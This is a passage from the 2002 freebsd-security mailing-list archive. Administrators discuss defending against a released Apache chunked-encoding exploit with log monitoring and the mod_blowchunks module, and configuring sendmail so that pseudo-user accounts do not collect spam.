'user_fqdn' seemed the obvious choice from the racoon.conf(5) docs. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 15:47:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns3.ideathcare.com (mail.allneo.com [216.185.96.68]) by hub.freebsd.org (Postfix) with SMTP id 1E94837B405 for ; Sat, 22 Jun 2002 15:47:26 -0700 (PDT) Received: (qmail 51653 invoked by uid 85); 22 Jun 2002 22:51:42 -0000 Received: from jps@funeralexchange.com by ns3.ideathcare.com with qmail-scanner-1.03 (uvscan: v4.1.40/v4121. . Clean. Processed in 0.228931 secs); 22 Jun 2002 22:51:42 -0000 Received: from unknown (HELO funeralexchange.com) (216.185.99.194) by mail.allneo.com with SMTP; 22 Jun 2002 22:51:42 -0000 Received: from 66.171.47.179 (SquirrelMail authenticated user jps@funeralexchange.com) by webmail.allneo.com with HTTP; Sat, 22 Jun 2002 17:48:08 -0500 (CDT) Message-ID: <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> Date: Sat, 22 Jun 2002 17:48:08 -0500 (CDT) Subject: Re: Apache FreeBSD exploit released From: To: In-Reply-To: <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> References: <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: X-Mailer: SquirrelMail (version 1.2.6) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have been trying to crack two of my FreeBSD boxes for the past 12 hours with not luck so far. # 1 Server apache+mod_ssl-1.3.23+2.8.7 4.6-RC FreeBSD 4.6-RC #2: Tue Jun 4 23:33:52 CDT 2002 # 2 Server apache+mod_ssl-1.3.17+2.8.0 4.5-STABLE FreeBSD 4.5-STABLE #1: Sun Apr 21 05:43:49 GMT 2002 If you read through the source of the exploit you will see that its preconfigured to only attack certain versions at this time. I do however believe with enough tweaking and time that you would crack a box. I have tried it so far with no luck against the system posted above and a older install with no luck either. The #1 server i am still trying to crack and i will continue till it either fails or succeeds. A couple of things to note on how to spot the attack in action. First is that your messages logfile will be getting between 4-12 HTTPD SIG11 a errors second. Secondly your httpd-error.log will also have the similar information. messages.log Jun 22 17:00:01 cremator /kernel: pid 41578 (httpd), uid 80: exited on signal 11 httpd-error.log [Sat Jun 22 17:43:52 2002] [notice] child pid 50043 exit signal Segmentation fault (11) The only way to trace the attacker i have found so far is to do a netstat during the attack and you will see the requests coming in on the requested port (80 by default). Anyone know of any ports or tools i could use on my servers to watch out for something like this?. I have already upgraded all my production servers to the latest versions to protect them but i still would like to have something like this in place just to be on the safe side. Thanks Jeremy Suo-Anttila jps@funeralexchange.com iUndertake Inc./ ALLNEO Network Operations. > For those of you who do not read bugtraq, GOBBLES have posted a new > version of their apache exploit which is said to support also Net and > FreeBSD. > > -- > // Krzysztof Zaraska * kzaraska (at) student.uci.agh.edu.pl > // Prelude IDS: http://www.prelude-ids.org/ > // A dream will always triumph over reality, once it is given the > chance. // -- Stanislaw Lem > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 15:58:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from totem.fix.no (totem.fix.no [80.91.32.29]) by hub.freebsd.org (Postfix) with ESMTP id 68F6F37B400 for ; Sat, 22 Jun 2002 15:58:14 -0700 (PDT) Received: by totem.fix.no (Postfix, from userid 1000) id 67B24202E6; Sun, 23 Jun 2002 00:58:22 +0200 (CEST) Date: Sun, 23 Jun 2002 00:58:22 +0200 From: Anders Nordby To: jps@funeralexchange.com Cc: kzaraska@student.uci.agh.edu.pl, freebsd-security@freebsd.org Subject: Re: Apache FreeBSD exploit released Message-ID: <20020622225822.GA65796@totem.fix.no> References: <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> User-Agent: Mutt/1.3.99i X-PGP-Key: http://anders.fix.no/pgp/ X-PGP-Key-FingerPrint: 1E0F C53C D8DF 6A8F EAAD 19C5 D12A BC9F 0083 5956 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, On Sat, Jun 22, 2002 at 05:48:08PM -0500, jps@funeralexchange.com wrote: > I have been trying to crack two of my FreeBSD boxes for the past 12 hours > with not luck so far. > # 1 Server > apache+mod_ssl-1.3.23+2.8.7 > 4.6-RC FreeBSD 4.6-RC #2: Tue Jun 4 23:33:52 CDT 2002 > > # 2 Server > apache+mod_ssl-1.3.17+2.8.0 > 4.5-STABLE FreeBSD 4.5-STABLE #1: Sun Apr 21 05:43:49 GMT 2002 I've been giving apache-nosejob.c a go too (on 4.5-RELEASE with Apache 1.3.23, which is no its target list) for some hours, no success except lots of httpds exiting on signal 11. > Segmentation fault (11) > The only way to trace the attacker i have found so far is to do a netstat > during the attack and you will see the requests coming in on the requested > port (80 by default). > Anyone know of any ports or tools i could use on my servers to watch out > for something like this?. I have already upgraded all my production > servers to the latest versions to protect them but i still would like to > have something like this in place just to be on the safe side. I just committed ports/www/mod_blowchunks, which you can use to reject and log chunked requests. Cheers, -- Anders. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 15:59:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id B156F37B401 for ; Sat, 22 Jun 2002 15:59:16 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA07468; Sat, 22 Jun 2002 16:58:55 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020622165052.02209380@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 22 Jun 2002 16:57:36 -0600 To: , From: Brett Glass Subject: Re: Apache FreeBSD exploit released Cc: In-Reply-To: <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> References: <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 04:48 PM 6/22/2002, jps@funeralexchange.com wrote: >Anyone know of any ports or tools i could use on my servers to watch out >for something like this? You can probably use some of the ideas I presented at the January BSDCon. Either the Apache SetEnvIf regexes or the SNOBOL log monitor will work for this one. See http://www.brettglass.com/logmonitors/paper.html for more. --Brett P.S. -- I'm still working on the replacement logging system mentioned in that paper. It has an entirely new architecture; the hard part has been backward compatibility with older Unices and with programs that expect to communicate with syslogd. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 17:45:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id 8DB0537B406 for ; Sat, 22 Jun 2002 17:45:28 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id B3826471DA; Sat, 22 Jun 2002 17:45:27 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id 174BAFDA0; Sat, 22 Jun 2002 17:45:25 -0700 (PDT) Message-ID: <3D151A24.52D568F5@pantherdragon.org> Date: Sat, 22 Jun 2002 17:45:24 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Lyndon Nerenberg Cc: "Kevin Kinsey, DaleCo, S.P." , Mark Hartley , twig les , security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam References: <200206221716.g5MHGmJZ082170@orthanc.ab.ca> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lyndon Nerenberg wrote: > >>>>> "Darren" == Darren Pilgrim writes: > > Darren> IMO the proper > Darren> way to handle this is to use an MTA that has some kind of > Darren> access-control mechanism to restrict mail delivery to > Darren> non-user accounts in addition to having a forwarding > Darren> mechanism for them. > > Such as a REJECT entry in /etc/mail/access? I believe that is only matched against the inbound sender address. I could be wrong, of course. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 18:33: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from marius.org (cdm-66-156-207-brcs.cox-internet.com [66.76.156.207]) by hub.freebsd.org (Postfix) with ESMTP id C48DE37B401; Sat, 22 Jun 2002 18:33:01 -0700 (PDT) Received: from marius.org (localhost [127.0.0.1]) by marius.org (8.12.3/8.12.3) with ESMTP id g5N1X0Nb045076; Sat, 22 Jun 2002 20:33:01 -0500 (CDT) (envelope-from marius@marius.org) Received: (from marius@localhost) by marius.org (8.12.3/8.12.3/Submit) id g5N1X0FZ045075; Sat, 22 Jun 2002 20:33:00 -0500 (CDT) Date: Sat, 22 Jun 2002 20:33:00 -0500 From: Marius Strom To: Anders Nordby Cc: jps@funeralexchange.com, kzaraska@student.uci.agh.edu.pl, freebsd-security@FreeBSD.ORG Subject: Re: Apache FreeBSD exploit released Message-ID: <20020623013300.GB35692@marius.org> Mail-Followup-To: Anders Nordby , jps@funeralexchange.com, kzaraska@student.uci.agh.edu.pl, freebsd-security@FreeBSD.ORG References: <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> <20020622225822.GA65796@totem.fix.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020622225822.GA65796@totem.fix.no> User-Agent: Mutt/1.3.99i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org fwiw, i've tested mod_blowchunks and it seems to work pretty well. ymmv. i wasn't able to exploit before installing it, so I have no guaranteed proof that it works (however, it doesn't seem to break anything we've got going either.) On Sun, 23 Jun 2002, Anders Nordby wrote: > Hello, > > On Sat, Jun 22, 2002 at 05:48:08PM -0500, jps@funeralexchange.com wrote: > > I have been trying to crack two of my FreeBSD boxes for the past 12 hours > > with not luck so far. > > # 1 Server > > apache+mod_ssl-1.3.23+2.8.7 > > 4.6-RC FreeBSD 4.6-RC #2: Tue Jun 4 23:33:52 CDT 2002 > > > > # 2 Server > > apache+mod_ssl-1.3.17+2.8.0 > > 4.5-STABLE FreeBSD 4.5-STABLE #1: Sun Apr 21 05:43:49 GMT 2002 > > I've been giving apache-nosejob.c a go too (on 4.5-RELEASE with Apache > 1.3.23, which is no its target list) for some hours, no success except > lots of httpds exiting on signal 11. > > > Segmentation fault (11) > > The only way to trace the attacker i have found so far is to do a netstat > > during the attack and you will see the requests coming in on the requested > > port (80 by default). > > Anyone know of any ports or tools i could use on my servers to watch out > > for something like this?. I have already upgraded all my production > > servers to the latest versions to protect them but i still would like to > > have something like this in place just to be on the safe side. > > I just committed ports/www/mod_blowchunks, which you can use to reject > and log chunked requests. > > Cheers, > > -- > Anders. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- /-------------------------------------------------> Marius Strom | Always carry a short length of fibre-optic cable. Professional Geek | If you get lost, then you can drop it on the System/Network Admin | ground, wait 10 minutes, and ask the backhoe http://www.marius.org/ | operator how to get back to civilization. \-------------| Alan Frame |----------------------> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 18:54: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.noos.fr (camus.noos.net [212.198.2.70]) by hub.freebsd.org (Postfix) with ESMTP id 48F1037B400 for ; Sat, 22 Jun 2002 18:54:03 -0700 (PDT) Received: (qmail 30933709 invoked by uid 0); 23 Jun 2002 01:54:01 -0000 Received: from unknown (HELO gits.gits.dyndns.org) ([212.198.229.153]) (envelope-sender ) by 212.198.2.70 (qmail-ldap-1.03) with SMTP for ; 23 Jun 2002 01:54:01 -0000 Received: from gits.gits.dyndns.org (0cmfoaohvzq1ggfk@localhost [127.0.0.1]) by gits.gits.dyndns.org (8.12.3/8.12.3) with ESMTP id g5N1s0Ab039286; Sun, 23 Jun 2002 03:54:01 +0200 (CEST) (envelope-from root@gits.dyndns.org) Received: (from root@localhost) by gits.gits.dyndns.org (8.12.3/8.12.3/Submit) id g5N1rsqZ039217; Sun, 23 Jun 2002 03:53:54 +0200 (CEST) (envelope-from root) Date: Sun, 23 Jun 2002 03:53:54 +0200 From: Cyrille Lefevre To: Lyndon Nerenberg Cc: Darren Pilgrim , "Kevin Kinsey, DaleCo, S.P." , Mark Hartley , twig les , security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam Message-ID: <20020623015353.GB14530@gits.dyndns.org> References: <3D13FFB2.39A80570@pantherdragon.org> <200206221716.g5MHGmJZ082170@orthanc.ab.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206221716.g5MHGmJZ082170@orthanc.ab.ca> User-Agent: Mutt/1.3.99i Organization: ACME X-Face: V|+c;4!|B?E%BE^{E6);aI.[< List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 22, 2002 at 11:16:48AM -0600, Lyndon Nerenberg wrote: > >>>>> "Darren" == Darren Pilgrim writes: > > Darren> IMO the proper > Darren> way to handle this is to use an MTA that has some kind of > Darren> access-control mechanism to restrict mail delivery to > Darren> non-user accounts in addition to having a forwarding > Darren> mechanism for them. > > Such as a REJECT entry in /etc/mail/access? the access seems to be only for domains, not users... the virtusertable would be a good choice for that : bin@domain error:5.1.1:550 User unknown too bad there is no xxxtable to handle such cases like : bin REJECT Cyrille. -- Cyrille Lefevre mailto:cyrille.lefevre@laposte.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 19: 7:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id B144537B400 for ; Sat, 22 Jun 2002 19:07:20 -0700 (PDT) Received: from horsey.gshapiro.net (gshapiro@localhost [IPv6:::1]) by horsey.gshapiro.net (8.12.5.Beta0/8.12.5.Beta0) with ESMTP id g5N27K36055328 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Sat, 22 Jun 2002 19:07:20 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.5.Beta0/8.12.5.Beta0/Submit) id g5N27JFY055325; Sat, 22 Jun 2002 19:07:19 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15637.11607.813966.761277@horsey.gshapiro.net> Date: Sat, 22 Jun 2002 19:07:19 -0700 From: Gregory Neil Shapiro To: Cyrille Lefevre Cc: security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam In-Reply-To: <20020623015353.GB14530@gits.dyndns.org> References: <3D13FFB2.39A80570@pantherdragon.org> <200206221716.g5MHGmJZ082170@orthanc.ab.ca> <20020623015353.GB14530@gits.dyndns.org> X-Mailer: VM 7.03 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org cyrille.lefevre> the access seems to be only for domains, not users... It can be used for usernames and complete addresses as well. However, for blocking incoming addresses, you need: FEATURE(`blacklist_recipients') Turns on the ability to block incoming mail for certain recipient usernames, hostnames, or addresses. For example, you can block incoming mail to user nobody, host foo.mydomain.com, or guest@bar.mydomain.com. These specifications are put in the access db as described in the anti-spam configuration control section later in this document. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 22: 8:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from pintail.mail.pas.earthlink.net (pintail.mail.pas.earthlink.net [207.217.120.122]) by hub.freebsd.org (Postfix) with ESMTP id 11D6337B401 for ; Sat, 22 Jun 2002 22:08:37 -0700 (PDT) Received: from user-2inivlc.dialup.mindspring.com ([165.121.126.172] helo=earthlink.net) by pintail.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17Lzbq-0001i6-00; Sat, 22 Jun 2002 22:08:23 -0700 Message-ID: <3D1557A3.4030504@earthlink.net> Date: Sat, 22 Jun 2002 22:07:47 -0700 From: Lawrence Sica User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Trevor Johnson Cc: security@freebsd.org Subject: Re: Possible security liability: Filling disks with junk or spam References: <20020621210455.F13586-100000@blues.jpj.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Trevor Johnson wrote: >>A client recently called me in puzzlement, saying that his system was >>misbehaving, and it turned out that this was what had happened. The address >>"news@victim.com" had somehow wound up on quite a few spammers' lists. He'd >>never used or hosted netnews, and so had no need for the pseudo-user. But that >>pseudo-user was there by default, and the system dutifully created a mailbox >>for him/her/it when the very first spam arrived. It started growing by leaps >>and bounds until it was -- I kid you not! -- several hundred megabytes in >>size. At which point the partition ran out of room. >> >>It seems to me that pseudo-users should be non-mailable, just as a basic >>security policy. Ideas for the best way to implement this in the default >>install? > > > My reading of the RFCs (excerpts follow) is that the "news" and "usenet" > addresses should receive mail when NNTP is in use. It seems like a task > for the sysadmin. How about comments in /etc/inetd.conf along the lines > of: > > # Enable e-mail to the "ftp" address if you turn this on (RFC 2142). > #ftp stream tcp6 nowait root /usr/libexec/ftpd ftpd -l > # > # Enable e-mail to the "uucp" address if you turn this on (RFC 2142). > #uucpd stream tcp nowait root /usr/libexec/uucpd uucpd > # > # Enable e-mail to "usenet" and "news" addresses if you turn this on (RFC 2142). > #nntp stream tcp nowait usenet /usr/libexec/nntpd nntpd > > with the addresses commented out in /etc/aliases? Running "df" every few > months wouldn't hurt, of course. > Consider that the daily output includes a df output so you just need to read your root email ;) They are commented in /etc/aliases. Actually you want to uncomment them. If a news user exists for example and no aliases is there it delivers it to the local spool for the news user. an alias would make it go elsewhere. Imho nothing is broken, and this isn't a security issue so much an admin issue. This is where knowing your system and paying attention come into play. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message